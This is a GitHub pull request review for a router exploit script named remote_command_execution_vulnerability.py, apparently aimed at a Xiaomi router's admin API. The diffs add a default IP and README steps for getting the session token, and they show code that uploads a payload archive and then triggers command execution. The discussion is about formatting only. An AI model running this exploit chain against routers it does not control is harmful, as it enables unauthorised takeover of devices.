### PR TITLE
Updates readme.md and adds reasonable default for IP address

### PR DESCRIPTION
**Pull request by jcrsilva**
Also reformats a bit of the code, this was done by autopep8

### CODE REVIEW

**Comment by acecilia** [comment]
Thanks :) left some comments

**Comment by jcrsilva** [comment]
Hey, no problem.

Where? I don't see anything. If you mean comments in the code they were already there, I just ran autopep8

**Comment by acecilia** [comment]
Sorry, forgot to finish the review. You should see them now :)

File: README.md [hunk 1]
```diff
@@ -9,6 +9,12 @@ pip3 install -r requirements.txt # Install requirements
 python3 remote_command_execution_vulnerability.py # Run the script
 ```
 
+You will be asked for the router IP address and for the `stok`.
+
+You can grab the `stok` from the router URL after you log in to the admin interface:
+
+![](readme/readme-001.png)
```
[the remark this answers is not in the document]
Comment (jcrsilva) [reply README.md:16]: Reduced to 40% size

File: remote_command_execution_vulnerability.py [hunk 2]
```diff
@@ -18,16 +18,17 @@
 import tarfile
 import requests
 
-router_ip_address = input("Router IP address: ")
-# router_ip_address = "192.168.0.21"
+router_ip_address = "192.168.31.1"
+router_ip_address = input(
+    f"Router IP address [{router_ip_address}]: ") or router_ip_address
```
[the remark this answers is not in the document]
Comment (jcrsilva) [reply remote_command_execution_vulnerability.py:23]: Is adding `click enter for using the default IP ` required? Adding defaults inside square brackets is convention, see [awscli](https://github.com/aws/aws-cli/#configuration) for an example

as for the line break, that's what autopep8 did, I'm going to try to fix it, but either it is pep compliant or it is all on the same line

[the remark this answers is not in the document]
Comment (jcrsilva) [reply remote_command_execution_vulnerability.py]: Changed line break, looks better, no longer pep8 compliant

File: remote_command_execution_vulnerability.py [hunk 3]
```diff
@@ -52,20 +53,22 @@
...
+    # tar.add("busybox")
+    # tar.add("extras/wget")
+    # tar.add("extras/xiaoqiang")
 
-## upload config file
+# upload config file
 print("start uploading config file...")
-r1 = requests.post("http://{}/cgi-bin/luci/;stok={}/api/misystem/c_upload".format(router_ip_address, stok), files={"image":open("build/payload.tar.gz",'rb')}, proxies=proxies)
+r1 = requests.post("http://{}/cgi-bin/luci/;stok={}/api/misystem/c_upload".format(
+    router_ip_address, stok), files={"image": open("build/payload.tar.gz", 'rb')}, proxies=proxies)
```
[the remark this answers is not in the document]
Comment (jcrsilva) [reply remote_command_execution_vulnerability.py]: Changed line break, looks better, no longer pep8 compliant

File: remote_command_execution_vulnerability.py [hunk 4]
```diff
@@ -52,20 +53,22 @@
...
 # print(r1.text)
 
-## exec download speed test, exec command
+# exec download speed test, exec command
 print("start exec command...")
-r2 = requests.get("http://{}/cgi-bin/luci/;stok={}/api/xqnetdetect/netspeed".format(router_ip_address, stok), proxies=proxies)
+r2 = requests.get("http://{}/cgi-bin/luci/;stok={}/api/xqnetdetect/netspeed".format(
+    router_ip_address, stok), proxies=proxies)
```
[the remark this answers is not in the document]
Comment (jcrsilva) [reply remote_command_execution_vulnerability.py]: Changed line break, looks better, no longer pep8 compliant

**Pull request merged**